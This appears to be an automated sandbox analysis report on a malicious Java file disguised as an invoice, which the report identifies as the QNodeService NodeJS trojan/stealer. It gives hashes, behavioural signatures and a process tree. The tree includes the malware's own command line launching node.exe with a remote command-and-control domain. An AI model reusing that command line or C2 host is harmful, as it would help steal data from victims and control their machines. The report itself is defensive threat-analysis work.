Analysis
-
max time kernel
128s -
max time network
152s -
platform
windows10_x64 -
resource
win10 -
submitted
21-10-2020 12:01
Static task
static1
Behavioral task
behavioral1
Sample
INVOICE _1106.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
INVOICE _1106.jar
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
INVOICE _1106.jar
-
Size
72KB
-
MD5
52894a1b1f752949a63e53561f076d62
-
SHA1
e05df8a4f5bc86a8f25cf4f20250cce1be5c251a
-
SHA256
87b4f32c8efd777e1add156beb424abd9441e122c78e40ddf968b20824f1a0f1
-
SHA512
309f1f89d325e12f55a72341bc62e19e75e6c820ea2c18a3b17687c44ef50750fc993a21dab8bf618531371b083a282be141230cde45e4a6e66c34674cd2f96b
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 1 IoCs
pid Process 2148 node.exe -
JavaScript code in executable 1 IoCs
resource yara_rule behavioral2/files/0x000100000001ad6c-175.dat js -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2148 node.exe 2148 node.exe 2148 node.exe 2148 node.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3056 wrote to memory of 1668 3056 java.exe 76 PID 3056 wrote to memory of 1668 3056 java.exe 76 PID 1668 wrote to memory of 2148 1668 javaw.exe 78 PID 1668 wrote to memory of 2148 1668 javaw.exe 78
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\INVOICE _1106.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\fbcdc658.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain success87.hopto.org3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2148
-
-